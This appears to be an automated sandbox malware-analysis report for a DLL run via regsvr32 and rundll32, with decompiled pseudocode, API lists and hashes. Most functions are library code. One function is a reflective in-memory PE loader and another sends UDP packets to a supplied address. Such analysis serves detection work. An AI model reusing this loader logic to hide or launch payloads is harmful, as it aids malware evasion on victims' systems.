0x1001d6df
0x1001d6df
0x1001d6df
0x1001d6e4
0x1001d6e8
0x1001d6ed
0x1001d6f5

APIs

Part of subcall function 1001BF79: __getptd_noexit.LIBCMT ref: 1001BF7A
Part of subcall function 1001BF79: __amsg_exit.LIBCMT ref: 1001BF87

__amsg_exit.LIBCMT ref: 1001D6E8
__lock.LIBCMT ref: 1001D6F8
InterlockedDecrement.KERNEL32(?), ref: 1001D715
InterlockedIncrement.KERNEL32(04DA1320), ref: 1001D740

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
Instruction ID: ba7e7af5003a78fddfad0021ce05134b2f36e9a59f0d2c47ef46babd1389d2ef
Opcode Fuzzy Hash: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
Instruction Fuzzy Hash: 95016D39904A21EBEB41FB65988679D77A4FF05790F11410AE804AF291DB34E9C2CB95

Uniqueness

Uniqueness Score: -1.00%

Function 10001360, Relevance: 6.0, APIs: 4, Instructions: 40
networkCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E10001360(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				short _v20;
				short _v22;
				char _v24;
				intOrPtr _v28;
				signed int _t15;
				short _t18;
				intOrPtr _t31;
				signed int _t33;

				_t15 =  *0x10057a08; // 0xe86d94f5
				_v8 = _t15 ^ _t33;
				_v28 = __ecx;
				_t18 = E100174D0(_t31,  &_v24, 0, 0x10);
				_v24 = 2;
				__imp__#11(_a4);
				_v20 = _t18;
				__imp__#9(_a8);
				_v22 = _t18;
				__imp__#20(_a12, _a16, 0,  &_v24, 0x10);
				return E100167D5(_v28, __ebx, _v8 ^ _t33, _a12, _t31, __esi,  *((intOrPtr*)(_v28 + 0x24)));
			}

0x10001366
0x1000136d
0x10001370
0x1000137b
0x10001383
0x1000138d
0x10001393
0x1000139b
0x100013a1
0x100013bc
0x100013cf

APIs

_memset.LIBCMT ref: 1000137B
inet_addr.WS2_32(?), ref: 1000138D
htons.WS2_32(?), ref: 1000139B
sendto.WS2_32(?,?,00000002,00000000,00000002,00000010), ref: 100013BC

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _memsethtonsinet_addrsendto
String ID:
API String ID: 1158618643-0
Opcode ID: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
Instruction ID: 4ca8e198367322d4385a70dad1c3d41f0382a071c465ebc2c9307440f54d584b
Opcode Fuzzy Hash: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
Instruction Fuzzy Hash: D0017CB590020DABDB00DFA4CC86EAE77B8FF48300F104419F905AB281EB70AA40DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000CCD3, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CCD3() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E10012913(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E1000C6E6(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E10017C60(_t16);
			}

0x1000ccd3
0x1000ccd6
0x1000ccde
0x1000cce4
0x1000cce4
0x1000ccec
0x1000ccf3
0x1000ccf3
0x1000ccfc
0x1000ccfe
0x1000cd04
0x1000cd07
0x1000cd0c
0x1000cd0c
0x1000cd07
0x1000cd16
0x1000cd1b
0x1000cd23
0x1000cd28
0x1000cd28
0x1000cd2e
0x1000cd36

APIs

EnableWindow.USER32(?,00000001), ref: 1000CCF3
GetActiveWindow.USER32 ref: 1000CCFE
SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,E86D94F5), ref: 1000CD0C
FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,E86D94F5), ref: 1000CD28

Part of subcall function 10012913: EnableWindow.USER32(?,E86D94F5), ref: 10012920

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
Instruction ID: b9d50a594c6b72ab84edc47d27728691b22d7b2ae70339502ef362fb55dd66ce
Opcode Fuzzy Hash: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
Instruction Fuzzy Hash: 97F04F3890071DDBEF12DB64C98599DBBF2FF48781B60002AE442722A5CB326D81DF51

Uniqueness

Uniqueness Score: -1.00%

Function 1000AD21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E1000AD21(void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t21;
				intOrPtr _t33;
				signed int _t36;

				_t11 =  *0x10057a08; // 0xe86d94f5
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E1000A7B3(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E1000AA3A(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E100167D5(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

0x1000ad2a
0x1000ad31
0x1000ad37
0x1000ad47
0x1000ad4f
0x1000ada6
0x1000ada6
0x1000ada6
0x1000ad55
0x1000ad5d
0x1000ad63
0x1000ad6b
0x1000ad6c
0x1000ad70
0x1000ad7b
0x1000ad81
0x1000ad82
0x1000ad83
0x00000000
0x1000ad85
0x1000ad90
0x1000ad9f
0x1000ad9f
0x1000ad83
0x1000adb4

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 1000AD47
PathFindExtensionA.SHLWAPI(?), ref: 1000AD5D

Part of subcall function 1000A7B3: _strcpy_s.LIBCMT ref: 1000A7BF

Part of subcall function 1000AA3A: __EH_prolog3.LIBCMT ref: 1000AA59
Part of subcall function 1000AA3A: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
Part of subcall function 1000AA3A: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40

Strings

%s.dll, xrefs: 1000AD63

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
String ID: %s.dll
API String ID: 3444012488-3668843792
Opcode ID: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
Instruction ID: a3b0371864cf8cb86b39257a88ab5a21b33b2e0076ae9bf6281b2400efea00f1
Opcode Fuzzy Hash: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
Instruction Fuzzy Hash: AD01F972A00018AFEF08DB74CD45DEE73B8DF46740F4102AAE906D3544EA70AB848662

Uniqueness

Uniqueness Score: -1.00%

Function 10002670, Relevance: 5.2, APIs: 4, Instructions: 181
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10002670(intOrPtr __ecx, intOrPtr* _a4) {
				void* _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				signed int* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t133;
				intOrPtr _t138;
				void* _t202;
				void* _t203;

				_v44 = __ecx;
				_v20 =  *((intOrPtr*)(_a4 + 4));
				_v16 = 1;
				_v12 =  *_a4 + 0x80;
				if( *((intOrPtr*)(_v12 + 4)) != 0) {
					_v8 = _v20 +  *_v12;
					while(IsBadReadPtr(_v8, 0x14) == 0 &&  *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t114 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c))))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *((intOrPtr*)(_a4 + 0x28)));
						_t203 = _t202 + 8;
						_v36 = _t114;
						if(_v36 != 0) {
							_t116 = E10001F00( *((intOrPtr*)(_a4 + 8)), 4 +  *(_a4 + 0xc) * 4);
							_t202 = _t203 + 8;
							_v28 = _t116;
							if(_v28 != 0) {
								 *((intOrPtr*)(_a4 + 8)) = _v28;
								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) +  *(_a4 + 0xc) * 4)) = _v36;
								 *(_a4 + 0xc) =  *(_a4 + 0xc) + 1;
								if( *_v8 == 0) {
									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								} else {
									_v32 = _v20 +  *_v8;
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								}
								while( *_v32 != 0) {
									if(( *_v32 & 0x80000000) == 0) {
										_v40 = _v20 +  *_v32;
										_t133 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36, _v40 + 2,  *((intOrPtr*)(_a4 + 0x28)));
										_t202 = _t202 + 0xc;
										 *_v24 = _t133;
									} else {
										_t138 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36,  *_v32 & 0x0000ffff,  *((intOrPtr*)(_a4 + 0x28)));
										_t202 = _t202 + 0xc;
										 *_v24 = _t138;
									}
									if( *_v24 != 0) {
										_v32 =  &(_v32[1]);
										_v24 = _v24 + 4;
										continue;
									} else {
										_v16 = 0;
										break;
									}
								}
								if(_v16 != 0) {
									_v8 = _v8 + 0x14;
									continue;
								}
								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
								SetLastError(0x7f);
								break;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
							SetLastError(0xe);
							_v16 = 0;
							break;
						}
						SetLastError(0x7e);
						_v16 = 0;
						break;
					}
					return _v16;
				}
				return 1;
			}

0x10002676
0x1000267f
0x10002682
0x10002693
0x1000269d
0x100026b1
0x100026bf
0x100026f7
0x100026f9
0x100026fc
0x10002703
0x1000272e
0x10002733
0x10002736
0x1000273d
0x1000276f
0x10002781
0x10002790
0x10002799
0x100027bd
0x100027c9
0x1000279b
0x100027a3
0x100027af
0x100027af
0x100027e0
0x100027f3
0x10002825
0x10002840
0x10002842
0x10002848
0x100027f5
0x10002811
0x10002813
0x10002819
0x10002819
0x10002850
0x100027d4
0x100027dd
0x00000000
0x10002852
0x10002852
0x00000000
0x10002852
0x10002850
0x10002864
0x100026bc
0x00000000
0x100026bc
0x10002877
0x1000287e
0x00000000
0x1000287e
0x10002750
0x10002757
0x1000275d
0x00000000
0x1000275d
0x10002707
0x1000270d
0x00000000
0x1000270d
0x00000000
0x1000288b
0x00000000

APIs

IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,10002C4E,00000000,00000000), ref: 100026C5
SetLastError.KERNEL32(0000007E), ref: 10002707

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
Instruction ID: 5b18a635dcf056017fd1ee77a603d3a0bb8baed770e763f1765233b10108ec1d
Opcode Fuzzy Hash: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
Instruction Fuzzy Hash: 7381BAB4A05209DFDB04CF94C880A9EB7B1FF88354F248159E819AB355D735EE82CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1001431B, Relevance: 5.0, APIs: 4, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E1001431B(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
				void* __edi;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t10;
				signed int _t11;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t14 = __esi;
				_t7 = __ebx;
				_t11 = _a4;
				_t20 = _t11 - 0x11;
				if(_t11 >= 0x11) {
					_t4 = E1000A0DB(__ebx, _t10, _t11, __esi, _t20);
				}
				if( *0x1005aac0 == 0) {
					_t4 = E100142F7();
				}
				_push(_t7);
				_push(_t17);
				_push(_t14);
				_t15 = 0x1005ac78 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x1005ac60);
					if( *_t15 == 0) {
						_t4 = 0x1005aac8 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x1005ac60);
				}
				EnterCriticalSection(0x1005aac8 + _t11 * 0x18);
				return _t4;
			}

0x1001431b
0x1001431b
0x1001431b
0x1001431c
0x10014320
0x10014323
0x10014325
0x10014325
0x10014331
0x10014333
0x10014333
0x10014338
0x1001433f
0x10014340
0x10014341
0x10014350
0x10014357
0x1001435c
0x10014363
0x10014366
0x1001436c
0x1001436c
0x10014373
0x10014373
0x1001437f
0x10014385

APIs

EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
Instruction ID: b2ae72b8ab0fae698251e24a42d2174316ff56aad592cf34d272a36c1b8e20b9
Opcode Fuzzy Hash: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
Instruction Fuzzy Hash: 05F090739002169BE700DF59CC89A1ABBA9FBC32A5F93011AF14096121DB3199C5CA61

Uniqueness

Uniqueness Score: -1.00%

Function 1001398E, Relevance: 5.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1001398E(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x1005aaa8
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}

0x10013990
0x10013993
0x10013993
0x10013997
0x1001399d
0x100139a3
0x100139cc
0x100139cd
0x00000000
0x100139d3
0x100139a5
0x100139a8
0x00000000
0x00000000
0x100139ac
0x100139b4
0x00000000
0x100139bb
0x100139c2
0x00000000
0x100139c8

APIs

EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013997
TlsGetValue.KERNEL32(1005AA8C,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139AC
LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139C2
LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139CD

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
Instruction ID: ae8276b6876f5357c50f650584214137971e28de593e3cdb7c29343fae997712
Opcode Fuzzy Hash: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
Instruction Fuzzy Hash: 27F012762006529FD710DF65CC8C90B77EDEF84291327D856E84697152D770F856CF50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 7160 Parent PID: 7132 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	13.6%
Signature Coverage:	0%
Total number of Nodes:	354
Total number of Limit Nodes:	25

Executed Functions

Function 10002900, Relevance: 22.8, APIs: 15, Instructions: 331
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E10002900(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				signed short* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				signed int _v32;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t180;
				void* _t191;
				void* _t198;
				void* _t202;
				intOrPtr _t209;
				void* _t220;
				intOrPtr _t269;
				intOrPtr _t278;
				intOrPtr _t326;

				_v100 = __ecx;
				_v72 = 0;
				_v20 = 0;
				if(E10001FE0(_v100, _a8, 0x40) != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t10 =  &(_v16[0x1e]); // 0x47e81005
						if(E10001FE0(_v100, _a8,  *_t10 + 0xf8) != 0) {
							_t15 =  &(_v16[0x1e]); // 0x47e81005
							_v80 = _a4 +  *_t15;
							if( *_v80 == 0x4550) {
								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
										_v32 =  *(_v80 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
											} else {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
											}
											if(_v88 > _v20) {
												_v20 = _v88;
											}
											_v12 = _v12 + 1;
											_v84 = _v84 + 0x28;
										}
										__imp__GetNativeSystemInfo( &_v68); // executed
										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _v64 - 0x00000001 &  !(_v64 - 1);
										_t65 = _v64 - 1; // -1
										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
											_v24 = _t180;
											if(_v24 != 0) {
												L26:
												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
												if(_v72 != 0) {
													 *((intOrPtr*)(_v72 + 4)) = _v24;
													asm("sbb edx, edx");
													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
													if(E10001FE0(_v100, _a8,  *(_v80 + 0x54)) != 0) {
														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
														_v8 = _t191;
														E10001E60(_v8, _v16,  *(_v80 + 0x54));
														_t115 =  &(_v16[0x1e]); // 0x47e81005
														 *_v72 = _v8 +  *_t115;
														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
														_t198 = E10002010(_v100, _a4, _a8, _v80, _v72); // executed
														if(_t198 != 0) {
															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
															_v76 = _t269;
															if(_t269 == 0) {
																 *((intOrPtr*)(_v72 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v72 + 0x18)) = E10002500(_v100, _v72, _v76);
															}
															if(E10002670(_v100, _v72) != 0) {
																_t202 = E10002300(_v100, _v72); // executed
																if(_t202 != 0) {
																	if(E10002480(_v100, _v72) != 0) {
																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
																			 *(_v72 + 0x2c) = 0;
																			L49:
																			return _v72;
																		}
																		if( *(_v72 + 0x14) == 0) {
																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																		_t209 =  *0x10058ed8; // 0x0
																		_t278 =  *0x10058ed4; // 0x1
																		_t326 =  *0x10058ed0; // 0x10000000
																		_v92 = _v96(_t326, _t278, _t209);
																		if(_v92 != 0) {
																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E10002EC0(_v100, _v72);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												VirtualFree(_v24, 0, 0x8000);
												SetLastError(0xe);
												return 0;
											}
											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
											_v24 = _t220;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}

APIs

Part of subcall function 10001FE0: SetLastError.KERNEL32(0000000D,?,?,10002925,10008AC6,00000040), ref: 10001FF1

SetLastError.KERNEL32(000000C1,10008AC6,00000040), ref: 10002948

Memory Dump Source

